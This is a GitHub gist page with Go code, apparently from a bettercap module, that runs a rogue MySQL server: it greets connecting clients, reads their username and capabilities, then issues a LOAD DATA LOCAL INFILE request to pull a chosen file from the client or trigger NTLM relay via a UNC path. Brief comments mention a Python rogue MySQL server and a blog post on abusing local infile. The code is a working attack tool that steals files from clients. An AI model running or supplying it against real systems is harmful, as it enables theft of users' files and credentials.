-
-
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for mysql.Running() { | |
// tcp listener | |
conn, err := mysql.listener.AcceptTCP() | |
if err != nil { | |
log.Warning("Error while accepting TCP connection: %s", err) | |
continue | |
} | |
// send the mysql greeting | |
conn.Write([]byte(MySQLGreeting)) | |
// read the incoming responses and retrieve infile | |
// TODO: include binary support and files > 16kb | |
b := make([]byte, 16384) | |
bufio.NewReader(conn).Read(b) | |
// parse client capabilities and validate connection | |
// TODO: parse mysql connections properly and | |
// display additional connection attributes | |
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8))) | |
if len(clientCapabilities) == 16 { | |
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0] | |
log.Info("MySQL connection from: %s", remoteAddress) | |
loadData := string(clientCapabilities[8]) | |
log.Info("Can Use LOAD DATA LOCAL: %s", loadData) | |
username := bytes.Split(b[36:], []byte{0})[0] | |
log.Info("MySQL Login Request Username: %s", username) | |
// send initial responseOK | |
conn.Write([]byte(FirstResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
conn.Write([]byte(GetFile)) | |
infileLen, err := bufio.NewReader(conn).Read(b) | |
if err != nil { | |
log.Warning("Error while reading buffer: %s", err) | |
continue | |
} | |
// check if the infile is an UNC path | |
if strings.HasPrefix(mysql.infile, "\\") { | |
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile) | |
} else { | |
// print the infile content, ignore mysql protocol headers | |
// TODO: include binary support and output to a file | |
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4]) | |
} | |
// send additional response | |
conn.Write([]byte(SecondResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
} | |
defer conn.Close() | |
(...) |
Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
ok i'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated